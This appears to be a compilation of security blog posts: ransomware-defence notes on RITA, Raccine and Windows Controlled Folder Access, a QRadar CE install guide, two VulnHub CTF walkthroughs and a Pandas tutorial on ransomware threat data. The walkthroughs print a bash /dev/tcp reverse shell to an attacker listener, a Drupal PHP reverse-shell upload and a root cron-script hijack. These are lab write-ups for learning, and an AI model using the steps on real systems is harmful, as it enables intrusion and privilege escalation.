3. Blacklist Checking: Query blacklists to search for suspicious domains and hosts
Check out RITA’s GitHub repo for more information about installation and usage.

Ransomware of the Third Kind

John says that Ransomware was typically seen in two categories:

Ransomware that encrypts your hard drive
Ransomware that encrypts your files

However, trends reveal a third kind of Ransomware - one using which attackers steal files and threaten to release them to the public. This is done for a couple of reasons:

Proof of Life: Attackers want to prove that they really have infiltrated the organization’s network and stolen data
Insurance: Attackers will release all files to the public if the ransom is not paid threatening confidentiality

Raccine - A Simple Ransomware Vaccine

We see Ransomware delete all shadow copies using vssadmin pretty often. What if we could just intercept that request and kill the invoking process? Let’s try to create a simple vaccine.

Neo23x0/Raccine is a simple yet powerful tool created by Florian Roth which can prevent Ransomware disaster. It works as follows:

We register a debugger for vssadmin.exe (and wmic.exe), which is our compiled raccine.exe. Raccine is a binary, that first collects all PIDs of the parent processes and then tries to kill all parent processes.

What is `vssadmin`?

The Volume Shadow Service Administration Tool (vssadmin.exe) is a default Windows process that manipulates volume shadow copies of the files on a given computer. These shadow copies are often used as backups, and they can be used to restore or revert files back to a previous state if they are corrupted or lost for some reason. vssadmin is commonly used by backup utilities and systems administrators.

As such, the people responsible for Ransomware campaigns often attempt to delete them so that their victims can’t restore file access by reverting to the shadow copies. As a note, interacting with vssadmin should require administrative privileges.

Check out this article from Red Canary explaining more about vssadmin and how to detect malicious usage.

Avantages:

The method is rather generic

We don’t have to replace a system file (vssadmin.exe or wmic.exe), which could lead to integrity problems and could break our raccination on each patch day

Flexible YARA rule scanning of command line params for malicious activity

The changes are easy to undo

Runs on Windows 7 / Windows 2008 R2 or higher

No running executable or additional service required (agent-less)

The legitimate use of vssadmin.exe delete shadows (or any other blacklisted combination) isn’t possible anymore

It even kills the processes that tried to invoke vssadmin.exe delete shadows, which could be a backup process

This won’t catch methods in which the malicious process isn’t one of the processes in the tree that has invoked vssadmin.exe (e.g. via schtasks)

Check out Raccine’s GitHub repo for more information about installation and usage.

Ransomware Protection in Windows

What is Controlled Folder Access?

Controlled folder access helps protect your valuable data from malicious apps and threats, such as Ransomware. Controlled folder access protects your data by checking apps against a list of known, trusted apps. Supported on Windows Server 2019 and Windows 10 version 1709 and later clients, controlled folder access can be turned on using the Windows Security App, Microsoft Endpoint Configuration Manager, or Intune (for managed devices).

With controlled folder access in place, a notification appears on the computer where an app attempted to make changes to a file in a protected folder. You can customize the notification with your company details and contact information. You can also enable the rules individually to customize what techniques the feature monitors.

The protected folders include common system folders (including boot sectors), and you can add more folders. You can also allow apps to give them access to the protected folders.

Windows system folders are protected by default, along with several other folders:

c:\Users\\Documents

c:\Users\Public\Documents

c:\Users\\Pictures

c:\Users\Public\Pictures

c:\Users\Public\Videos

c:\Users\\Videos

c:\Users\\Music

c:\Users\Public\Music

c:\Users\\Favorites

You can configure additional folders as protected, but you cannot remove the Windows system folders that are protected by default.

Check out this page on Microsoft docs to learn more about Controlled Folder Access and its features.

IOCs vs Hardening & Generic Rules

John referred to this Tweet from Florian below and commented about the over-reliance on IOCs to detect Ransomware.

Instead, organizations should focus on hardening using generic rules to detect known malicious techniques. This is due to the fact that IOCs (file hashes, IP addresses, etc) can vary in instances of targeted attacks due to customization and obfuscation by the attacker.

The typical approach #Ransomware pic.twitter.com/0RXF1RE4fd
— Florian Roth (@cyb3rops) May 11, 2021

Install Qradar Ce On Virtualbox

2020-05-30T00:00:00+00:00

In this tutorial, we will learn how to install IBM QRadar Community Edition V7.3.3 on VirtualBox.

Note: IBM has issued a flash notice for QRadar Administrators.

According to IBM: QRadar development has recently identified a defect in the product licensing function, which may cause the deployment to stop functioning. All QRadar versions are affected by this issue.

QRadar CE Administrators must SSH into QRadar as root and run the single-line command for QRadar CE as detailed in the flash notice. Once completed, wait 5 minutes for the changes to complete. Administrators are not required to restart any services for this change as the file loads automatically. Log in to the QRadar Console. Click the Log Activity tab and verify Events are received correctly.

IBM QRadar SIEM is a world-class SIEM tool used by organizations for monitoring and correlating logs from different systems. QRadar can quickly alert SOC Analysts about potential malicious activity and prompt them to take appropriate action.

QRadar Community Edition is a version of QRadar which is great for enthusiasts and learners. According to IBM:

Community Edition is a fully-featured free version of QRadar that is low memory, low EPS, and includes a perpetual license. This version is limited to 50 events per second and 5,000 network flows a minute, supports apps, but is based on a smaller footprint for non-enterprise use.

Pre-requisites

Download the QRadar CE V7.3.3 OVA from the official website

You will need to create an IBM account to complete the download
Download and install VirtualBox from the official website

I am using VirtualBox 6.0 on my MacBook Pro with macOS Mojave
According to IBM, the minimum system requirements are:
8 GB RAM (10 GB is recommended)
250 GB free disk space
2 CPU cores (6 cores is recommended)
At least one network adapter with Internet connection

1. Verify the QRadar CE OVA

Once the QRadar CE V7.3.3 OVA is downloaded, let us start by verifying the integrity of the file. IBM provides a button on the QRadar CE page called SHA256 Sum for OVA. Click on it to open a .txt file with the SHA256 checksum. Use your checksum utility of choice to generate the SHA256 checksum for the downloaded OVA file. I will use shasum utility accessible via the Mac terminal.

As seen in the screenshot above, the integrity of the OVA file has been confirmed.

2. Import QRadar CE OVA into VirtualBox

The next step is to launch VirtualBox.

Click on the Import button and choose the downloaded QRadar CE OVA file. VirtualBox should automatically populate the Appliance settings information. At this stage, we can choose to leave the settings in their default state or make minor changes such as VM name. If required, these settings can be modified later. Click on Import.

As seen in the screenshot above, the memory assigned to the VM is 6144 MB (6 GB). I will pump this up to 8192 MB (8 GB) as recommended by IBM. To achieve this, click on the Settings button and navigate to System > Motherboard > Base Memory. Increase the memory and press OK.

The storage is 250 GB is by default and the number of processors is 2. I will increase this to 4 for better performance. To achieve this, click on the Settings button and navigate to System > Processor > Processors and increase the processors to 4. Press OK once completed.

I will leave the networking settings as the default - Bridged mode. Please take care when changing the networking settings as it is important to ensure that the VM has access to the Internet.

3. Launch QRadar CE VM

The next step is to launch the VM by clicking on Start.

The default username is root. Type in root and press Enter.

We are immediately prompted to change the password. Remember to use a strong password.

The next step is to launch the setup script and complete the setup process. Run an ls command to verify that the setup script exists in the directory and run it using the command ./setup

You will be prompted to accept the CentOS 7 Linux EULA. Read and press Enter to accept the license terms.

Press Y to proceed with the installation process.

Let QRadar complete the installation steps. This might take a while; be patient!

After a while, you should see a message saying Press ENTER to complete Installation. Press Enter as directed by the message.

You will be prompted to enter the new admin password. This is the password for the admin user on QRadar CE web user interface. Remember to use a strong password. Note that this is a different account from the previous root user account for the CentOS VM.

The next step is to verify the installation and access the QRadar CE user interface.

4. Verify the QRadar CE Installation

The easiest way to verify if the QRadar CE user interface is up and running is to use the curl command on the CentOS VM.

Run the command: curl https://localhost -k and the output should be as seen in the screenshot below.

Note the -k option in the curl command which skips certificate validation. You can also use --insecure.

Now that QRadar CE is working on localhost (CentOS VM), we can try accessing it remotely from the host machine. To achieve this, we need to grab the IP address of the CentOS VM.

Use the ifconfig command to quickly view the IP address.

As seen in the screenshot above, the IP address is 192.168.0.182. I will now attempt to connect to this IP from my host machine (MacBook Pro).

Before attempting access from a web browser, I will repeat the curl command on the Mac terminal: curl https://192.168.0.182 -k. If all goes well, the output should be same as what we see below and in the previous curl output from the CentOS VM.

Great! Looks like there is proper connectivity. I will fire up Google Chrome and attempt to access QRadar CE.

Chrome will display a Your connection is not private warning. We can ignore this for now and click on Advanced > Proceed to 192.168.0.182 (unsafe)

There you go! Welcome to QRadar CE. Log in with the username admin and password which was set on the console during the installation step.

You will be greeted with the QRadar Community Edition - License Agreement. Read and click on Accept to continue.

This is the Dashboard view of QRadar CE. However, I noticed that the System Time (displayed on the top-right) is not tuned to my timezone.

To change the System Time, click on Admin to open the Admin menu.

Next, click on System and License Management.

Select the localhost (console) item and click on the Actions menu item. Under Actions, click on View and Manage System.

Before we change the system time, I would like to mention that this is a critical area of QRadar CE as there are a variety of configuration options. You can view the licensing details such as EPS utilization, configure the firewall to whitelist IP addresses, and configure an email server among many other actions.

Click on System Time and set the desired time and select the correct timezone. Once completed, press Save.

You will be notified that services will be restarted and asked for another confirmation. Press OK.

Once we provide confirmation, a message should appear saying System Time is updated successfully. Services will now restart as seen in the screenshot below. You can close the tab and refresh the QRadar CE home page in a few minutes.

Conclusion & What’s Next

In this tutorial, we installed QRadar CE V7.3.3 on VirtualBox and completed basic configuration of the system time. QRadar CE offers SIEM Administrators, SOC Analysts, and enthusiasts the power to experiment and practice real-world concepts in a test environment.

The next step is to feed some logs into our newly installed QRadar CE. It is to be noted that QRadar CE only supports a handful of parsers/DSMs (Device Support Modules) out of the box. The complete list can be viewed in the QRadar CE V7.3.3 Official Documentation. However, more DSMs can be added for more integrations. Check out this video for more details.

I recommend starting with a basic integration such as Linux OS. This can be easily achieved with Linux VM (such as CentOS or Ubuntu) using syslog. Check out this video for more details.

Here are some other useful resources:

Please reach out if you have any questions or comments.

Vulnhub Escalate My Privileges Walkthrough

2020-04-12T00:00:00+00:00

Escalate My Privileges: 1 is a challenge posted on VulnHub created by Akanksha Sachin Verma. This is a write-up of my experience solving this awesome CTF challenge.

With my Attack Machine (Kali Linux) and Victim Machine (Escalate My Privileges: 1) set up and running, I decided to get down to solving this challenge.

Read more about my set up and environment here

I decided to start my journey by noting down the IP address of our victim machine. We are lucky that the author decided to display it directly on the login screen of the CentOS server.

Great! The victim machine has the IP address 192.168.56.120. Let’s continue with some port scanning (as usual 😏).

I decided to use my trusty nmap with options enabled to scan all ports and provide details about the service running using the command: nmap -p- -sV 192.168.56.120

The nmap scan revealed a whole bunch of open ports on the victim machine. Now, the first thing that I noticed was port 80 and I decided to navigate to the website (http://192.168.56.102) using Firefox ESR as follows:

Cool! A pretty index.html webpage which goes well with the theme of the challenge 😎

Whenever, I am faced with a HTML page, I make it a point to view the webpage source code before attempting brute-force using tools like dirb or dirbuster. I decided to hit to view the webpage source.

Interesting! The alt attribute in the img tag has a URL - http://ip/phpbash.php

I decided to check out http://192.168.56.120/phpbash.php by replacing ip with the victim machine’s IP address.

Oh my God - command execution 😳

I decided to play with some basic Linux commands to learn more about my privileges.

Looks like I am apache.

I decided to check for more users on the victim machine and look for clues. For this purpose, I ran the command: cd /home to navigate to the /home directory where I can find other users (if any).

Bingo! Looks like there is a user called armour on the victim machine. I decided to look inside using the command: ls -lsa armour to also display hidden files (if any).

C’mon it is literally right there - Credentials.txt

What does it contain? I decided to find out…

The Credentials.txt file contains the following text:

my password is
md5(rootroot1)

Woohoo! A password… but how to use it?

Maybe SSH? Our previous nmap scan did show that port 22 was open. Also, the website did not have a login portal or something similar. I decided to try the SSH approach.

But first - I decided to compute the MD5 hash of the password string - rootroot1 using the simple Linux command: echo -n rootroot1 | md5sum

The -n option for the echo command prevents output of the trailing newline

Great! We have our password!

I decided to try logging into the victim machine as armour using the command: ssh armour@192.168.56.120

Damn! Not what I had expected!

I decided to go back to the webpage. Maybe I can login to the armour account directly using the su Linux command as follows: su - armour

Read more about su vs sudo here

Hmm, Authentication failure.

I decided to explore a different approach - Reverse Shell. Maybe an interactive shell will allow me to input the MD5 password hash and escalate my privileges from apache to beyond 😎

With my handy Reverse Shell Cheat Sheet by pentestmonkey, I decided to proceed by launching nc -lvp 1010 on my attack machine to listen for connections. Then, on the webpage command execution input, I ran the command:

bash -i >& /dev/tcp/192.168.56.119/1010 0>&1 where 192.168.56.120 is the IP address of attack machine and port 1010 is the randomly selected port on which nc is listening on for connections.

Lo and behold!

Still apache btw!

Now, to login as armour using the command: su - armour

Woohoo! I am armour

It is important to note that once the password is entered, there is no manual prompt. You just need to type in any command and see 😏

Okay, the next step is to escalate my privileges and capture the flag. But how?

I decided to proceed by checking for sudo rights for the user armour. To do this, I ran the command: sudo -l

Bah! Enough is enough! It is time to get a full tty shell.

I ran my usual ever-wonderful Python tty command: python -c 'import pty; pty.spawn("/bin/bash");'

That’s when I decided to check the version of Python. After all, Python can’t betray me 😳

Oh look what we have here!

Python 3.6 - Hurrah!

I decided to try the same Python tty command using python3 this time as follows: python3 -c 'import pty; pty.spawn("/bin/bash");'

Well, there you go! Finally!

Back to checking for a chance to exploit sudo rights using the command: sudo -l

Like a kid in a candy store. Woah!

How about using good ol’ bash?

We did it! We got root! Heck yes!

…Now for the flag 😎

Is that MD5? 😏

My Thoughts

That was a great challenge from Akanksha Sachin Verma! I really enjoyed going back to the basics. Privilege escalation is one of those areas where practice is everything and this challenge seems to be straightforward enough for a beginner (with boatloads of trial-and-error of course 😁)

I am writing a Vulnhub walkthrough after almost 7 months and had to do a LOT of Google-fu and re-read my old material to complete this challenge.

I look forward to solving more challenges in the Escalate My Privileges series.

If you enjoyed reading this write-up, please check out my other Vulnhub walkthroughs.

Vulnhub Dc 7 Walkthrough

2019-09-03T00:00:00+00:00

DC: 7 is a challenge posted on VulnHub created by DCAU. This is a write-up of my experience solving this awesome CTF challenge.

With my Attack Machine (Kali Linux) and Victim Machine (DC: 7) set up and running, I decided to get down to solving this challenge.

Read more about my set up and environment here

I decided to start my journey with netdiscover to complete the host discovery phase as follows: netdiscover -r 192.168.56.0/24

Cool! The victim machine has the IP address 192.168.56.103. Let’s continue with some port scanning!

I decided to use nmap with options enabled to scan all ports and provide details about the service running using the command: nmap -p- -sV 192.168.56.103

The nmap scan revealed that ports 80 and 22 were open. I decided to hit the browser using Firefox ESR. I navigated to the URL http://192.168.56.103 as follows:

Drupal!

…And a message from @DCAU asking us NOT to try the easy way out with brute-force or dictionary attacks. Clearly, there is a bigger picture here. If only we knew how to find it!

I decided to play with the website a little bit. First, I decided to check out the Login page.

Obviously, neither admin/admin nor root/root worked ;)

Analyzing robots.txt wasn’t useful either.

Now, in the back of my mind, I was sure that like WPScan for WordPress and joomscan for Joomla… there must be something similar for Drupal. Some googling revealed droopescan, an open-source scanner for several CMSs including Drupal available on Kali Linux.

I decided to use droopescan to scan the Drupal website using the following command: droopescan scan -u http://192.168.56.103

Interesting!

The Drupal version appears to be 8.7.x and using the startupgrowth_lite theme. I must admit that I was not greatly knowledgeable of Drupal at that time. So, I jumped over to searchsploit to find a way to own this box!

Nothing of significance!

This was when I felt absolutely stuck and decided to ping @DCAU7 (creator of the challenge) on Twitter for a hint. Amazingly, he responded quickly with a tip that got me right back in the game!

The real way to go about this challenge requires an open mind and “outside the box” thinking. @DCAU7 meant this literally. I decided to navigate back to the homepage.

At the footer, there is some text saying @DC7USER

In my initial look, I assumed it was the author’s Twitter handle. Upon closer inspection, something looked fishy. I decided to browse to the URL http://twitter.com/DC7USER

Ka-ching!

Ooh, a GitHub link. I proceeded by following the GitHub URL to https://github.com/Dc7User/

Oh my!

A very real GitHub account with a single repository staffdb. I decided to look inside this mysterious repository.

Interesting! Lots and lots of PHP code files. They must contain something valuable. I decided that searching these PHP files would be easier with a text editor. So, I proceeded by cloning the repository using git clone and opening the folder using Visual Studio Code.

Going through each PHP file one by one, I found that the most interesting file was config.php which contained the following data:

Wow! Credentials!

Username: dc7user
Password MdR3xOgB7#dW

Where do I use them? Drupal? SSH? I decided to try both.

Drupal Login did not work. Moving on to SSH… please work!

I attempted to gain SSH access to the box using the command: ssh dc7user@192.168.56.103

Woohoo! We got shell as dc7user!

What’s next? Privilege escalation. I was determined to find a way out of dc7user and reach the flag. I decided to go exploring the box.

A quick ls -l revealed a file called mbox and a directory called backups containing 2 GPG encrypted files. As far as I was concerned, these were encrypted because they contained some valuable information. Perhaps, some credentials for the Drupal website?

What’s inside mbox? Maybe some mail? I decided to run a simple cat mbox command to know more.

Well, we got mail. Upon closer inspection, each mail is a notification about the result of a scheduled cron job. One important observation is the Subject field of the mail which tells us the location of the scheduled script as: /opt/scripts/backups.sh

Let’s look inside!

Jackpot! We can clearly see what’s happening here. The script flows as follows:

Delete contents of the /home/dc7user/backups directory
Use drush (Drupal shell) to create an SQL dump of the Drupal database
Create a compressed copy of all the website files
Encrypt both files using GPG with the passphrase PickYourOwnPassword
Sets the owner of contents inside /home/dc7user/backups as dc7user:dc7user which means both user and group access is limited to dc7user
Deletes the files

Now, I was ecstatic because I knew how to own this box. This technique is well known in the world of CTF - You modify the script, add in lines to output the contents of flag.txt to a readable file and let it run in its own glory as root.

But… there was a problem!

I am dc7user and I cannot modify this file. I need to become www-data for my technique to work. Besides, I knew that @DCAU wouldn’t make it too easy for us.

Moving on, I decided to use the acquired passphrase PickYourOwnPassword and view the contents of the 2 encrypted files inside /home/dc7user/backups. It is crucial to remember what the script does because the contents of this directory are deleted periodically. I decided to create a temporary directory to comfortably solve this challenge using the command: mkdir /tmp/arj

Okay, let’s decrypt!

I decided to start with the SQL database dump - website.sql gpg --decrypt website.sql.gpg > /tmp/arj/website.sql

I entered the passphrase as PickYourOwnPassword

It worked!

Great, we have website.sql inside /tmp/arj ready for exploration. As seen above, the size of the decrypted file is 380 MB.

Our goal is to search this file for user credentials for Drupal Login. Ideally, once we gain GUI access, we can launch a reverse shell as www-data and proceed with owning the box.

I decided to take a peek at the SQL dump using the command: head -n 50 website.sql

Knowing the table name would be useful. However, I had no clue about Drupal’s internal naming conventions. I decided to find it the hard way with some good ol’ grep magic using the command: cat website.sql | grep "Table structure for table"

3 tables caught my attention:

users
users_data
users_field_data

Now, my solution is neither the cleanest nor most efficient… but I wanted the credentials and this worked.

cat website.sql | grep -A 30 "Table structure for table `users`"

The optional argument -A refers to lines after the matched line. We can conclude that the users table does not contain credentials. Moving on to users_data using the command:

cat website.sql | grep -A 30 "Table structure for table `users_data`"

Nope, nothing. Moving on to the final table users_field_data using the command:

cat website.sql | grep -A 30 "Table structure for table `users_field_data`"

Woohoo! The table users_field_data contains name, pass, mail and other user-specific fields. Let’s expand the grep and view some data!

cat website.sql | grep -A 40 "Table structure for table `users_field_data`"

As seen above in the screenshot, we got credentials for admin and dc7user. Only problem being that the passwords were hashed. I tried cracking the hash online with the hopes that it was a known value but there was nothing!

At this point, I was stuck and pondered about the next step.

The motive was still to become www-data and modify the cron script to get the flag. I proceeded with some research about Drupal. Specifically, I was trying to find a way to change the password of an existing user since I confirmed the existence of 2 users - admin and dc7user.

Interestingly, I found that the drush tool for Drupal is pretty useful when it comes to changing the password of admin. The syntax was simple:

drush user-password USERNAME --password="SOMEPASSWORD"

I decided to try it… why not?

drush user-password admin --password="SOMEPASSWORD"

Hmm, an error.

Some googling and research later, I discovered that executing drush from the /var/www/html directory would be successful.

I decided to try it out.

Success!

I just changed the password of admin to SOMEPASSWORD. Let’s login to Drupal!

Yeah! We are in!

So far so good. The next step is to establish a reverse shell. The php-reverse-shell seemed like a viable option. The question was - how can we upload PHP code on Drupal?

WordPress has taught me that themes, modules, and plugins are typical vectors. I decided to do some research. You know, Google-for-the-soul.

In my googling, I came across a wonderful article titled Drupal to Reverse Shell describing how we can work with an authenticated Drupal interface to upload PHP code and establish a reverse shell session. However, there was a problem.

The article achieves a reverse shell by enabling a Drupal module called PHP filter. The documentation contains an interesting snippet:

The PHP filter core module has been removed from core starting with version 8.x.

Our victim machine is running Drupal 8.7.x and does not come with the PHP filter module. But… there is always a way. Manual installation!

This link contains a .tar.gz download which can be directly uploaded to Drupal as admin.

I proceeded by downloading the .tar.gz module file on my attack machine. Don’t forget to check the networking settings. I switched mine from host-only networking to NAT for just a second.

Time to install the new module!

On the Extend page, I clicked on the + Install new module button.

I clicked on the Browse button under Upload a module or theme archive to install and clicked on the Install button.

Woohoo! Installed successfully. Let’s move on!

I clicked on Enable newly added modules which brought me back to the Extend page. Here, I scrolled down and select the radio button next to PHP Filter in order to enable it.

Next, scroll down completely and click on the Install button to reflect the changes on Drupal.

Great! We installed PHP filter. The next step is to use it to upload the php-reverse-shell code. To achieve this, I decided to create a new post on Drupal.

Important steps to follow:

Select the Text format as PHP code
Copy the php-reverse-shell code to the Body. On Kali Linux, it can be found in /usr/share/laudanum/php/php-reverse-shell.php
Edit the php-reverse-shell code and modify the following lines:

- $ip = '192.168.56.102'; // Attack machine IP        
- $port = 8888; // Desired port

Open a shell and run nc -lvp 8888 on attack machine to listen for a reverse shell

Once these steps are completed. Click on the Preview button and watch the magic unfold!

Reverse shell! I am finally www-data. Hooray!

Okay… back to the game plan. We simply need to modify /opt/scripts/backups.sh with the following lines of code:

#!/bin/bash
cat /root/\* > /tmp/arj/flag.txt

Once this was done, I simply monitored my temporary directory /tmp/arj for a file called flag.txt.

Yeah! There you have it. We did it :)

My Thoughts

That was absolutely crazy! I never expected anything less from @DCAU.

For me, DC: 7 was all about thinking outside the box and reinforcing good practices. Owning a box running Drupal was an added bonus because of all its details and intricacies.

I owe credit to @DCAU for an initial hint about the Twitter handle. The idea that most CTF challenges lack OSINT is known and needs attention. With more challenges such as these, I am sure that I can build my skills.

As always, I cannot wait for the next one in the DC series!

If you enjoyed reading this, please check out my DC: 6 walkthrough and DC: 3 walkthrough which are challenges by @DCAU in the DC series.

Practical Python Pandas

2019-07-19T00:00:00+00:00

In this tutorial, we will learn how to use Pandas - a must-have Python module for Data Analysis and Data Visualization with a real-world example from the Cyber Security domain.

Note: Ransomware Tracker is no longer operational since 08 December 2019. It is still recommended that readers leverage the concepts and Jupyter Notebook available in this tutorial.

Introduction

Ransomware Tracker by abuse.ch is a website which tracks and monitors hosts and URLs associated with known Ransomware.

The website maintains a tracker which is frequently updated with threat intelligence associated with known Ransomware families. The screenshot below shows an interactive table on the Ransomware Tracker website populated with Ransomware threat intelligence.

The most interesting feature of Ransomware Tracker is the availability of a feed in the CSV (Comma Separated Values) format which allows us to easily capture and utilize this intelligence.

The screenshot below shows the Ransomware Tracker data in its raw CSV format accessible via the URL - https://ransomwaretracker.abuse.ch/feeds/csv/

Our objective is to read, parse, and generate insights from this Ransomware Tracker data using Python with Pandas.

Getting Started

For the purpose of this tutorial, we will use a Jupyter Notebook to write Python code and produce output. Here is a complete, easy to understand introduction to Jupyter Notebooks and how to get started.

The first step is to fetch the data.

As mentioned earlier, our data resides online as a CSV document. Pandas provides us with the read_csv function to read CSV data and store it into a DataFrame structure.

import pandas as pd
url = "https://ransomwaretracker.abuse.ch/feeds/csv/"
df = pd.read_csv(url, skiprows=8, encoding="latin-1")

We start by importing the Pandas module and reference it as pd instead of pandas. This is a personal preference but is commonly seen in tutorials online.

Next, we initialize a variable url with the Ransomware Tracker CSV URL. This variable has a data type of str.

Finally, we make a function call to pd.read_csv with arguments as follows

url - location where our CSV feed resides (required)
skiprows - number of rows to skip from the top of the CSV document (in our case the first 8 lines are comments)
encoding - text encoding to be used

Now, we have df (our DataFrame) with the data loaded from the URL. Let us validate the data and its structure.

df.shape
# (13866, 10)
df.head()

df.head() prints the first 5 rows of the DataFrame by default. You can change this by specifying the required number of rows as an argument. Hence, df.head(n) will print the first n rows of the DataFrame.

Next, we validate the bottom values of the DataFrame. This is good practice for large datasets such as Ransomware Tracker with over 13,000 rows of data.

df.tail()

In our output, we can confirm the following facts:

The DataFrame recognized the header names
All fields are parsed correctly and unavailable fields are replaced with NaN value
The last row is a comment and needs to be removed

To remove the last row of the DataFrame, we can use a simple one-liner from Pandas:

df.drop(df.tail(1).index, inplace=True)
df.tail()

Great!

Now, the df.shape command should return (13865, 10) since we removed the last row of the DataFrame.

Data Transformation

The next step involves manipulating and transforming the data in our DataFrame.

Let’s start with fixing the header names (also known as column names) of the DataFrame. To do this, we start by retrieving the list of existing header names.

list(df.columns)
'''
['# Firstseen (UTC)',
 'Threat',
 'Malware',
 'Host',
 'URL',
 'Status',
 'Registrar',
 'IP address(es)',
 'ASN(s)',
 'Country']
'''

I decided to make the DataFrame easier to read and comprehend with the following header name changes.

Old: # Firstseen (UTC)
New: Firstseen
Old: IP address(es)
New: IPs
Old: ASN(s)
New: ASNs

To accomplish this, we can use the df.rename function as follows.

columns = {'# Firstseen (UTC)': 'Firstseen', 'IP address(es)': 'IPs', 'ASN(s)':'ASNs'}
df = df.rename(columns=columns)
df.head()

The Firstseen column in our DataFrame can provide us with a treasure of knowledge.

However, the values available consist of a date and time. We simply want the date. This requires a transformation of the values in the Firstseen column in our DataFrame.

Before we apply the solution in the context of the DataFrame, let us shift perspective. Consider a value from the Firsteen column. For example - 2018-08-12 00:46:13

s_dt = '2018-08-12 00:46:13'
type(s_dt)
# str

The goal is to transform this value into our desired format. I choose to change the format to 12-08-2018. How can we do this?

Python provides us with a useful module called datetime for this exact purpose. We can leverage the datetime.strptime function to convert s_dt (a str object) to a datetime object as follows.

import datetime
o_dt = datetime.datetime.strptime(s_dt,'%Y-%m-%d %H:%M:%S')
type(o_dt)
# datetime.datetime

Now, we construct our desired format DD-MM-YYYY using the datetime.strftime function and o_dt (the datetime object) as follows.

s1_dt = o_dt.strftime("%d-%m-%Y")
s1_dt
# '12-08-2018'
type(s1_dt)
# str

Easy! We successfully transformed one string but what about an entire DataFrame column?

To achieve this, we can use the df.apply function which applies a function along an axis of the DataFrame. For the function aspect, I choose to construct a lambda function (popularly known as anonymous functions).

df['Firstseen'] = df['Firstseen'].apply(lambda x: datetime.datetime.strptime(x,'%Y-%m-%d %H:%M:%S').strftime("%d-%m-%Y"))
df.head()

Voila! Let us dissect the above command…

df['Firstseen'].apply(lambda x: datetime.datetime.strptime(x,'%Y-%m-%d %H:%M:%S').strftime("%d-%m-%Y"))

Here:

df['Firsteen'] refers to the column Firstseen in the DataFrame df
lambda x: datetime.datetime.strptime(x,'%Y-%m-%d %H:%M:%S').strftime("%d-%m-%Y") is our lambda function.
- The x in lambda x references each element in the Firstseen column.
- datetime.datetime.strptime(x,'%Y-%m-%d %H:%M:%S') converts each x (str object) to a datetime object using the provided format.
- strftime("%d-%m-%Y") then converts each datetime object back to str in the provided format (DD-MM-YYYY).
We apply this lambda function across the entire Firstseen column using df.apply function

The biggest takeaway is to always achieve the desired transformation at the element-level before attempting to manipulate the DataFrame.

Querying

The next step is to query the DataFrame and generate valuable insights. In this step, I aim to use Pandas to perform operations on the DataFrame, extract output, and visualize the results.

Query 1: Number of entries per threat

In this query, we want to categorize our dataset based on the Threat field. This basically involves a group by operation followed by aggregation and sorting. I write the query as follows.

df.groupby('Threat').size().sort_values(ascending=False)
'''
Threat
Distribution Site    11297
Payment Site          1660
C2                     908
dtype: int64
'''

Interesting! The output indicates the existence of 3 threats - Distribution Site, Payment Site and C2 (Command and Control Site). As seen in the Python query, we utilize a variety of Pandas functions to manipulate the data.

Now, how about a visualization?

Visualization of data in Python can be achieved with a variety of libraries such as Matplotlib, Seaborn, and ggplot. Read more here.

Pandas comes with an in-built df.plot function exposing useful plotting abilities. In fact, df.plot basically refers to Matplotlib in the backend for visualization.

Let’s create a simple horizontal bar graph to illustrate the different categories of threats and their counts. The query is as follows.

df.groupby(['Threat']).size().sort_values(ascending=False).plot(kind='barh')

The df.plot function is an effective tool to generate useful graphs. In our simple example above, we specified the argument kind=barh to indicate a horizontal bar graph.

Query 2: Yearly trend in malware

For the next query, I decided to play with the Firstseen field of the DataFrame. A valuable tip is to always attempt trend analysis if the dataset contains date/time fields.

This query is slightly more complex as compared to the previous one. The first transformation involves creating a new DataFrame column called Firstseen_year in which the “year” from the Firstseen element is captured and stored. We accomplish this by using a custom defined lambda function.

df['Firstseen_year'] = df['Firstseen'].apply(lambda x: datetime.datetime.strptime(x,'%d-%m-%Y').strftime("%Y"))

Before we continue, let us understand the dtypes or data types of elements within our DataFrame using the following command.

df.dtypes
'''
Firstseen         object
Threat            object
Malware           object
Host              object
URL               object
Status            object
Registrar         object
IPs               object
ASNs              object
Country           object
Firstseen_year    object
dtype: object
'''

As seen above, all the elements are of object data type which is equivalent to str data type in Python. When working with date/time elements, it is strongly recommended to ensure a suitable data type. This especially matters for operations such as sorting.

One mechanism to change the dtype of a column is to use the df.astype function as follows.

df['Firstseen_year'] = df['Firstseen_year'].astype('datetime64[ns]')
df.dtypes
'''
Firstseen                 object
Threat                    object
Malware                   object
Host                      object
URL                       object
Status                    object
Registrar                 object
IPs                       object
ASNs                      object
Country                   object
Firstseen_year    datetime64[ns]
dtype: object
'''

Great! Our DataFrame column Firstseen_year now has data type as datetime64[ns].

Although this is the correct way to work with date/time elements, it is important to note that side-effects are plenty. Let us take a look at the contents of the DataFrame df.

df[['Firstseen','Firstseen_year']].head()

As we can see, once we extract 2018 from 12-08-2018 and convert it to the datetime64[ns] data type, we end up with 2018-01-01.

While it makes sense… it does not meet our desired format i.e., year only. This means that we absolutely require 2018 instead of 2018-01-01 and the like. But how?

Simple!

Since df['Firstseen_year'] is of the data type datetime64[ns], we can extract the “year” part of the date/time object as follows.

df['Firstseen_year'] = df['Firstseen_year'].dt.year
df[['Firstseen','Firstseen_year']].head()

Wait, what about the data types?

df.dtypes
'''
Firstseen         object
Threat            object
Malware           object
Host              object
URL               object
Status            object
Registrar         object
IPs               object
ASNs              object
Country           object
Firstseen_year     int64
dtype: object
'''

As we can see, Firstseen_year column has int64 values. Now, operations such as sorting can be achieved accurately. Back to the query!

ax = df[['Firstseen_year','Malware']].groupby('Firstseen_year').count().sort_values(by='Firstseen_year', ascending=False).plot(kind='area', figsize=(20,5))
ax.set_xlabel("Firstseen Year")
ax.set_ylabel("Number of Malware")
ax.set_title("Yearly Malware Trend - Ransomware Tracker")

The above query includes many useful features of the df.plot function. This is an example of an area graph. The figsize=(20,5) argument indicates the size of the graph produced as output.

No graph is complete without appropriate x and y labels. The set_xlabel and set_ylabel functions play a significant role in helping us define these labels.

Query 3: Number of malware per threat per year

For the next query, I decided to focus on a slightly more complex query. This time, I decided to utilize two fields - Firstseen_year and Threat.

To achieve this query, we simply require two group-by instructions followed by aggregation.

df.groupby(['Firstseen_year','Threat']).size()
'''
Firstseen_year  Threat           
2015            C2                      37
2016            C2                     709
                Distribution Site    10441
                Payment Site          1346
2017            C2                     140
                Distribution Site      843
                Payment Site           314
2018            C2                      22
                Distribution Site       13
dtype: int64
'''

The insights generated here is extremely valuable. Finding correlations between different columns and fields is typically achieved using the df.groupby function. Visualizing the results would be the icing on the cake!

Let’s visualize the data as follows.

